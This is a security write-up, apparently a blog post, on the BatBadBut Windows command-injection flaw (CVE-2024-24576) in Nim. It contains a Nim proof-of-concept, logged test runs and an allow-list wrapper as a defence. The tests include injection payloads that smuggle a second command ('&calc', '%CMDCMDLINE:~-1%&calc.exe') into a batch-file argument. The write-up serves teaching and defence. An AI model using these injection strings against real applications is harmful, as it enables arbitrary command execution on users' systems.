# Exploring Command Injection Vulnerabilities in Windows with Nim

In light of the recent discovery outlined in Flatt Security Research's article, the BatBadBut vulnerability (CVE-2024-24576) presents a critical concern for command execution security on Windows. A practical investigation using the Nim programming language offers insight into how attackers might exploit this vulnerability.

Nim, known for its efficiency and expressiveness, isn't immune to the subtle intricacies of command execution on Windows. By experimenting with a simple Nim script that executes a `test.bat` file with varying inputs, we uncover the nuances of the command injection vulnerability.
## The Experiment

The Nim script executes the batch file in three distinct manners:

- Without quoting the shell input.
- With quoting, using `quoteShell`.
- Direct shell command execution.
```nim
import osproc, os

block execProcess_NoQuoteShell:
  echo "[*] execProcess NoQuoteShell"
  echo "enter payload here"
  let input = readLine(stdin)
  # The argument is passed as-is; Nim applies its own quoting when it builds the command line.
  let output = execProcess("test.bat", args = @[input],
                           options = {poUsePath, poStdErrToStdOut})
  echo "Output:\n", output

block execProcess_QuoteShell:
  echo "[*] execProcess QuoteShell"
  echo "enter payload here"
  # quoteShell (from os) escapes the input before it is handed over as an argument.
  let input = readLine(stdin).quoteShell()
  let output = execProcess("test.bat", args = @[input],
                           options = {poUsePath, poStdErrToStdOut})
  echo "Output:\n", output

block execShellCmd:
  echo "[*] execShellCmd"
  echo "enter payload here"
  let input = readLine(stdin)
  echo "Output:"
  # The input is concatenated straight into a shell command line.
  discard execShellCmd("test.bat " & input)
```
## Test 1: Simple Payload

A benign payload, `nim &calc`, reveals differing behaviors:

- The unquoted execution passes the payload intact, echoing it back without unintended consequences.
- Quoting via `quoteShell` results in misinterpretation, breaking the command.
- Direct execution surprisingly splits the input, inadvertently running `calc`.
```text
[*] execProcess NoQuoteShell
enter payload here
nim &calc
Output:
Argument received: "nim &calc" # escaped correctly

[*] execProcess QuoteShell
enter payload here
nim &calc
Output:
Argument received: "\"nim
'calc\""' is not recognized as an internal or external command,
operable program or batch file.

[*] execShellCmd
enter payload here
nim &calc
Output:
Argument received: nim # it runs calc
```
## Test 2: Sophisticated Payload

Using a more complex payload, `nim" &calc`, illustrates further discrepancies:

- Unquoted execution interprets the command in a risky manner, running `calc`.
- Quoted execution this time escapes correctly, showcasing the intended safety mechanism.
- Direct execution correctly handles the input but underscores potential risk areas.
```text
[*] execProcess NoQuoteShell
enter payload here
nim" &calc
Output:
Argument received: "nim\" # it runs calc

[*] execProcess QuoteShell
enter payload here
nim" &calc
Output:
Argument received: "\"nim\\\" &calc\"" # escaped correctly

[*] execShellCmd
enter payload here
nim" &calc
Output:
Argument received: nim" &calc # escaped correctly
```
## Test 3: Exploitative Payload

An exploitative payload, `%CMDCMDLINE:~-1%&calc.exe`, designed to directly invoke `calc.exe`, unearths a consistent threat across all execution methods, demonstrating the ease of initiating unintended commands.
```text
[*] execProcess NoQuoteShell
enter payload here
%CMDCMDLINE:~-1%&calc.exe
Output:
Argument received: e

[*] execProcess QuoteShell
enter payload here
%CMDCMDLINE:~-1%&calc.exe
Output:
Argument received: e

[*] execShellCmd
enter payload here
%CMDCMDLINE:~-1%&calc.exe
Output:
Argument received: e
```
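All three tests above show that quoting alone cannot be trusted when the target is a `.bat` file: `quoteShell` breaks the benign input in Test 1 and is bypassed outright in Test 3. The wrapper below is an added example (my code, not part of this repository or of Nim's standard library) that takes the other route the conclusion recommends: it refuses any argument containing a character `cmd.exe` could interpret, rather than attempting to escape it. The names `validateBatArg`, `offendingChars`, `runBat` and `BatArgError`, and the allow-list itself, are this example's own assumptions; it only uses `execProcess` from `osproc` and `Letters`, `Digits` and `allCharsInSet` from `strutils`.

```nim
## Added example: an allow-list wrapper for running a .bat file with
## caller-supplied arguments. Not part of the original PoC; the helper
## names and the allow-list are this example's own choices.
import std/[osproc, strutils]

type
  BatArgError* = object of ValueError

# Characters that carry no meaning for cmd.exe: letters, digits and the few
# punctuation marks found in plain tokens and file paths. Everything else
# (space, quotes, %, !, &, |, <, >, ^, parentheses, CR, LF, ...) is refused.
const SafeBatChars* = Letters + Digits + {'-', '_', '.', ':', '\\'}

proc validateBatArg*(arg: string): bool =
  ## True only when `arg` is non-empty and every character is allow-listed.
  arg.len > 0 and arg.allCharsInSet(SafeBatChars)

proc offendingChars*(arg: string): set[char] =
  ## The characters of `arg` outside the allow-list, for logging why a
  ## request was refused; empty when the argument is acceptable.
  for c in arg:
    if c notin SafeBatChars:
      result.incl c

proc runBat*(bat: string, args: openArray[string]): string =
  ## Runs `bat` with `args` only after every argument passes the allow-list.
  ## With metacharacters excluded, Nim's normal argument quoting is harmless,
  ## so the standard execProcess path is used unchanged.
  for a in args:
    if not validateBatArg(a):
      raise newException(BatArgError,
        "refusing to run " & bat & ": an argument contains characters cmd.exe may interpret")
  execProcess(bat, args = args, options = {poUsePath, poStdErrToStdOut})

when isMainModule:
  # The three payloads from the tests above plus one legitimate token,
  # embedded here as constructed input.
  for candidate in ["nim &calc", "nim\" &calc", "%CMDCMDLINE:~-1%&calc.exe",
                    "report-2024.txt"]:
    let bad = offendingChars(candidate)
    if bad.card == 0:
      echo "accepted: ", candidate
    else:
      echo "rejected: ", candidate, "  offending: ", $bad
  # Only the last candidate reaches execProcess; the batch file is still
  # the test.bat used in the experiment, so this part is Windows-only.
  when defined(windows):
    echo runBat("test.bat", ["report-2024.txt"])
```

The design choice is deliberate: the allow-list is far narrower than what `cmd.exe` would technically accept, because the page's own results show how an escaping scheme that looks right for one input (Test 2) fails for another (Test 3). Widen `SafeBatChars` only for characters you have confirmed `cmd.exe` treats literally in every position, and log `offendingChars` on refusal so injection attempts show up in your application logs.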
## Conclusion

This exploration underscores the critical need for vigilance and proper input handling in programming languages running on Windows. While Nim provides mechanisms to mitigate injection attacks, their effectiveness relies heavily on the developer's awareness and application of security best practices. The BatBadBut vulnerability serves as a stark reminder of the ever-present risks in software development and the importance of continuous learning and adaptation.

For developers, this experiment highlights the importance of sanitizing input and carefully considering the execution context of external commands. The detailed research and PoC, available at the following links, can further guide and inform secure coding practices:

- CVE-2024-24576 PoC on GitHub: https://github.com/frostb1ten/CVE-2024-24576-PoC
- Flatt Security Research article: https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/